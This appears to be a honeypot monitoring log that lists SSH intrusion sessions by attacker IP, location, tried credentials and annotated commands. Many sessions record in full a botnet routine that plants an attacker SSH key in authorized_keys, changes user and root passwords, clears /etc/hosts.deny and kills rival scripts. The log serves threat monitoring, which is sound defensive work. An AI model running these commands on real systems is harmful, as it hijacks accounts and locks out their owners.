🎭 lantern_root_7 (113.142.60.99) β€” Xincheng, China Β· 1 session Β· 1 cmd
2026-06-07 13:12 EDT Β· as root/ο»Ώ------fuck------
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -s -m
🎭 shadow_5 (77.42.68.88) β€” Helsinki, Finland Β· 1 session Β· 1 cmd
2026-06-07 12:34 EDT Β· as jimster/Jimster@1
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 ghost_pi (186.148.224.183) β€” Burzaco, Argentina Β· 1 session Β· 20 cmds
2026-06-07 10:43 EDT Β· as adv/adv123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "adv123\naaOJ7pZdoemJ\naaOJ7pZdoemJ"|passwd|bash
$ Enter new UNIX password:
$ echo "adv123\naaOJ7pZdoemJ\naaOJ7pZdoemJ\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 stein (178.105.176.35) β€” Nuremberg, Germany Β· 1 session Β· 1 cmd
2026-06-07 09:19 EDT Β· as jimster/Jimster@1
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 phantom_root_30 (81.210.53.105) β€” Warsaw, Poland Β· 1 session Β· 19 cmds
2026-06-07 09:10 EDT Β· as root/zxcvbnm2022
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:OhZF4tj0ldOz"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 burger_crypto (192.142.2.40) β€” Miami, United States Β· 1 session Β· 20 cmds
2026-06-07 09:00 EDT Β· as gay/123456
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "123456\nUJIYOJmeJIuP\nUJIYOJmeJIuP"|passwd|bash
$ Enter new UNIX password:
$ echo "123456\nUJIYOJmeJIuP\nUJIYOJmeJIuP\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 specter_root_30 (121.52.147.5) β€” Islamabad, Pakistan Β· 1 session Β· 19 cmds
2026-06-07 08:18 EDT Β· as root/ZL123456@
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:YwHuGNspgy5I"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 wraith_4 (201.103.214.31) β€” Miguel Hidalgo, Mexico Β· 1 session Β· 20 cmds
2026-06-07 08:09 EDT Β· as sawmill/sawmill123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "sawmill123\nZM6f842eWOTR\nZM6f842eWOTR"|passwd|bash
$ Enter new UNIX password:
$ echo "sawmill123\nZM6f842eWOTR\nZM6f842eWOTR\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 gouda_sol_6 (176.65.139.217) β€” Eygelshoven, The Netherlands Β· 2 sessions Β· 2 cmds
2026-06-07 06:04 EDT Β· as gary/gary, root/test1234
Ran uname 2x across 2 sessions β€” automated OS fingerprinting.
$ uname -s -v -n -r -m Γ—2
🎭 star_root_20 (167.71.87.254) β€” Clifton, United States Β· 1 session Β· 1 cmd
2026-06-07 05:00 EDT Β· as jimster/jimster2025!
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 specter_root_31 (118.193.38.183) β€” Hong Kong, Hong Kong Β· 1 session Β· 19 cmds
2026-06-07 04:51 EDT Β· as root/Work@2026
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:ANcG6f0KLRl8"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 phantom_root_31 (116.118.4.222) β€” Hanoi, Vietnam Β· 1 session Β· 1 cmd
2026-06-07 04:43 EDT Β· as root/P@ssword2025
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 cipher_root_33 (193.219.97.19) β€” Langenzersdorf, Austria Β· 1 session Β· 1 cmd
2026-06-07 03:38 EDT Β· as root/Jimster1!
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 strudel (138.3.243.192) β€” Frankfurt am Main, Germany Β· 1 session Β· 1 cmd
2026-06-07 03:22 EDT Β· as jimster/123456
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 rogue_sol_2 (64.89.161.184) β€” Schieren, Luxembourg Β· 1 session Β· 1 cmd
2026-06-07 03:02 EDT Β· as root/test1234
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -s -v -n -r -m
🎭 scone_root_2 (172.94.9.73) β€” City of London, United Kingdom Β· 1 session Β· 1 cmd
2026-06-07 02:30 EDT Β· as root/Jimster@2026
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 shadow_root_31 (190.221.50.123) β€” Buenos Aires, Argentina Β· 1 session Β· 20 cmds
2026-06-07 00:59 EDT Β· as normaluser/normaluser
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "normaluser\nmdlICl8KXwZT\nmdlICl8KXwZT"|passwd|bash
$ Enter new UNIX password:
$ echo "normaluser\nmdlICl8KXwZT\nmdlICl8KXwZT\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 chateau_root_5 (95.111.230.218) β€” Lauterbourg, France Β· 1 session Β· 20 cmds
2026-06-07 00:56 EDT Β· as aris/aris123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "aris123\nlWpnyO57p38K\nlWpnyO57p38K"|passwd|bash
$ Enter new UNIX password:
$ echo "aris123\nlWpnyO57p38K\nlWpnyO57p38K\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 ghost_root_45 (103.250.11.176) β€” Singapore, Singapore Β· 2 sessions Β· 39 cmds
2026-05-31 00:16 EDT Β· as root/Ni123456, user/p@ssword
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:sEcGGTMoSKXl"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "p@ssword\nJa094PL8FqZw\nJa094PL8FqZw"|passwd|bash
$ Enter new UNIX password:
$ echo "p@ssword\nJa094PL8FqZw\nJa094PL8FqZw\n"|passwd
🎭 nasi_root (202.165.15.132) β€” Kuala Lumpur, Malaysia Β· 2 sessions Β· 39 cmds
2026-05-07 00:07 EDT Β· as admin/abc, root/Ni123456
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:io153pOkBkFw"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "abc\nba2MN7bCgIPV\nba2MN7bCgIPV"|passwd|bash
$ Enter new UNIX password:
$ echo "abc\nba2MN7bCgIPV\nba2MN7bCgIPV\n"|passwd
🎭 cosmo_root_3 (109.167.249.94) β€” Garbolovo, Russia Β· 1 session Β· 19 cmds
2026-06-06 23:51 EDT Β· as root/Ni123456
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:oVVhhsmCdVNW"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 silk_root_8 (14.103.127.84) β€” Haidian, China Β· 1 session Β· 20 cmds
2026-06-06 23:38 EDT Β· as aliyun/aliyun
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "aliyun\nrZAri9CuHm8w\nrZAri9CuHm8w"|passwd|bash
$ Enter new UNIX password:
$ echo "aliyun\nrZAri9CuHm8w\nrZAri9CuHm8w\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 wraith_root_37 (181.188.172.6) β€” La Paz, Bolivia Β· 1 session Β· 20 cmds
2026-06-06 22:54 EDT Β· as alex/qwe123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "qwe123\nvRSahRs2r30q\nvRSahRs2r30q"|passwd|bash
$ Enter new UNIX password:
$ echo "qwe123\nvRSahRs2r30q\nvRSahRs2r30q\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 silk_root_9 (182.61.35.171) β€” Beijing, China Β· 1 session Β· 20 cmds
2026-06-06 22:54 EDT Β· as saad/1234
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
